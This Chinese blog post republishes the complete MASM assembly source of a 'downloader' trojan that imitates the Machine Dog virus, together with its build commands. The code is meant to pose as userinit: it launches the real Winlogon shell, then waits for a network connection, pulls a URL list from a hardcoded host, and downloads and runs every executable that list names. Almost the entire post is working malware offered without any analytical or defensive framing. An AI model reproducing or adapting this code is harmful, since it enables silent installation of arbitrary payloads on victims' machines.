08-06
25

(非原创)整理后的"下载者"病毒的代码

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 仿机器狗的感染文件代码
; by naitm(http://hi.baidu.com/naitm)
;
; ml /c /coff /nologo userinit.asm
; Link /align:0x10 /subsystem:windows /nologo userinit.obj
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
        .386
        .model flat,stdcall
        option casemap:none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include        windows.inc
include        user32.inc
includelib    user32.lib
include        kernel32.inc
includelib    kernel32.lib
include        Advapi32.inc
includelib    Advapi32.lib
include        wininet.inc
includelib    wininet.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
        .data    
nThreadCount    dd        0
szTempPath        db     '.',0
szValueName        db        'Shell',0
szUser32Dll        db        'user32.dll',0
szLoadRemoteFonts    db    'LoadRemoteFonts',0
szSubKey            db     'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0
szUrlList         db     'http://10.0.0.90/cert.cer',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
        .code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;以当前进程的STARTUPINFO启动exe文件
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RunIt            proc    @lpExePath

local @stStartupInfo:STARTUPINFO
local    @stProcessInformation:PROCESS_INFORMATION

    invoke    GetStartupInfo,addr @stStartupInfo
    invoke    CreateProcess,NULL,@lpExePath,NULL,NULL,FALSE,NORMAL_PRIORITY_CLASS,\
                NULL,NULL,addr @stStartupInfo,addr @stProcessInformation
                
    .if    eax == 0
        invoke    CloseHandle,@stProcessInformation.hThread
        invoke    CloseHandle,@stProcessInformation.hProcess        
    .endif
    
    ret
    
_RunIt            endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;下载文件
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_DownloadFile    proc    @lpURL,@lpSaveFile,@Buffer

local @hInternet,@hInternetFile,@hLocalFile,@NumberOfBytesWritten,@nNumberOfBytesToWrite,@nWriteCount
local    @lpbuffer[200h]:BYTE
    
    xor eax,eax
    mov @nWriteCount,eax
    
    invoke    InternetOpen,offset szValueName,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
    .if    eax != NULL
        mov    @hInternet, eax
        invoke    InternetSetOption,@hInternet,INTERNET_OPTION_CONNECT_TIMEOUT,@Buffer,4
        invoke    InternetSetOption,@hInternet,INTERNET_OPTION_CONTROL_RECEIVE_TIMEOUT,@Buffer,4
        invoke    InternetOpenUrl,@hInternet,@lpURL,NULL,NULL,INTERNET_FLAG_EXISTING_CONNECT,0
        .if    eax != NULL
            mov    @hInternetFile, eax
            mov    @nNumberOfBytesToWrite, 0
            mov    @NumberOfBytesWritten, 200h
            invoke    HttpQueryInfo,@hInternetFile,HTTP_QUERY_STATUS_CODE,addr @lpbuffer,\
                        addr @NumberOfBytesWritten,@nNumberOfBytesToWrite
            .if    eax != NULL
                invoke    CreateFile,@lpSaveFile,GENERIC_WRITE,0,NULL,OPEN_ALWAYS,0,0
                .if    eax != 0FFFFFFFFh
                    mov    @hLocalFile, eax
                    .while TRUE
                        mov @nNumberOfBytesToWrite,0
                        invoke    InternetReadFile,@hInternetFile,addr @lpbuffer,200h,addr @nNumberOfBytesToWrite
                        .break    .if (!eax)
                        .break    .if (@nNumberOfBytesToWrite==0)
                        inc    @nWriteCount
                        invoke    WriteFile,@hLocalFile,addr @lpbuffer,@nNumberOfBytesToWrite,addr @NumberOfBytesWritten,0
                    .endw
                    invoke    SetEndOfFile,@hLocalFile
                    invoke    CloseHandle,@hLocalFile
                .endif                            
            .endif
            invoke    InternetCloseHandle,@hInternetFile
        .endif
        invoke    InternetCloseHandle,@hInternet
    .endif    
    
    mov    eax,@nWriteCount
        
    ret

_DownloadFile   endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_DownloadEXERunIt proc    @lpURL

local    @DownTimes
local    @TempFileName[100h]:BYTE
local    @szUrl[100h]:BYTE

    mov    @DownTimes,3Ch
    invoke    lstrcpy,addr @szUrl,@lpURL
    invoke    RtlZeroMemory,addr @TempFileName,100h
    invoke    GetTempFileName,offset szTempPath,NULL,0,addr @TempFileName
    
    .repeat
        invoke    _DownloadFile,addr @szUrl,addr @TempFileName,1388h
        .if eax != NULL
            invoke    _RunIt,addr @TempFileName
            .break
        .else
            invoke    Sleep,3E8h
            dec    @DownTimes
        .endif
    .until (!@DownTimes)
    
    dec    nThreadCount
    
    ret

_DownloadEXERunIt endp        
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
main proc

local @hKey,@nSizeOfPath,@hFile,@hObject,@lpBaseAddress
local    @szWinlogonPath[104h]:BYTE

    ;加载user32.dll,执行LoadRemoteFonts函数 (这函数是干吗的?)
    invoke    LoadLibrary,offset szUser32Dll
    .if    eax != NULL
        invoke    GetProcAddress,eax,offset szLoadRemoteFonts
        .if    eax != NULL
            call eax
        .endif
    .endif
    
    ;启动winlogon
    invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,offset szSubKey,0,KEY_READ,addr @hKey
    .if eax == ERROR_SUCCESS
        mov    @nSizeOfPath,104h
        invoke    RtlZeroMemory,addr @szWinlogonPath,104h
        invoke    RegQueryValueEx,@hKey,offset szValueName,0,NULL,addr @szWinlogonPath,addr @nSizeOfPath
        invoke    _RunIt,addr @szWinlogonPath
        invoke    RegCloseKey,@hKey        
    .endif
    
    ;检查网络是否连接,不断重试
    invoke    Sleep,3E8h
    .while TRUE
        invoke    InternetGetConnectedState,addr @nSizeOfPath,0
        .break    .if eax
    .endw
    
    ;取一个临时文件名,并下载列表
    invoke    RtlZeroMemory,addr @szWinlogonPath,104h
    invoke    GetTempFileName,offset szTempPath,0,0,addr @szWinlogonPath    
    invoke    Sleep,3E8h
DownloadList:
    .while TRUE
        invoke    _DownloadFile,offset szUrlList,addr @szWinlogonPath,1388h
        .break    .if eax
    .endw
    
    ;打开列表文件,验证后开始下载
    invoke    CreateFile,addr @szWinlogonPath,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL
    .if    eax != INVALID_HANDLE_VALUE
        mov @hFile,eax
        invoke    GetFileSize,@hFile,NULL
        .if    eax >= 0Fh    ;文件提价小于F个字节则认为下载文件错误
            invoke    CreateFileMapping,@hFile,NULL,PAGE_READONLY,0,0,NULL
            .if    eax != NULL
                mov    @hObject,eax
                invoke    MapViewOfFile,eax,FILE_MAP_READ,0,0,0
                .if    eax != NULL
                    mov    @lpBaseAddress,eax
                    mov    esi,eax    
                    
                BeginDownEXE:    
                    lea    edi,@szWinlogonPath
                    invoke    RtlZeroMemory,edi,104h
                    
                    ;查找回车标志,查找到后将@szWinlogonPath传入_DownloadEXERunIt
                    .repeat
                        lodsb
                        .if    al == 0Ah
                            lodsb
                        .endif    
                        .if    al == 0Dh
                            .if    @szWinlogonPath != 0
                                inc    nThreadCount
                                invoke    CreateThread,NULL,0,offset _DownloadEXERunIt,addr @szWinlogonPath,0,addr @nSizeOfPath
                                invoke    CloseHandle,eax
                                invoke    Sleep,64h
                            .endif
                            jmp    BeginDownEXE
                        .endif
                        stosb
                    .until (!al)

                    invoke    UnmapViewOfFile,@lpBaseAddress
                .endif
                invoke    CloseHandle,@hObject
            .endif
        .else
            invoke    CloseHandle,@hFile
            jmp    DownloadList
        .endif
        invoke    CloseHandle,@hFile
    .else
        jmp    DownloadList    ;无法打开则重新下载
    .endif

    ;不断sleep,直到所有线程结束
    .while    nThreadCount
        invoke    Sleep,64h
    .endw
    
    invoke    ExitProcess,0

main endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
    end    start


文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: 下载者 病毒 木马
相关日志:
评论: 0 | 引用: 0 | 查看次数: 508
发表评论
昵 称:
密 码: 游客发言不需要密码.
内 容:
验证码: 验证码
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭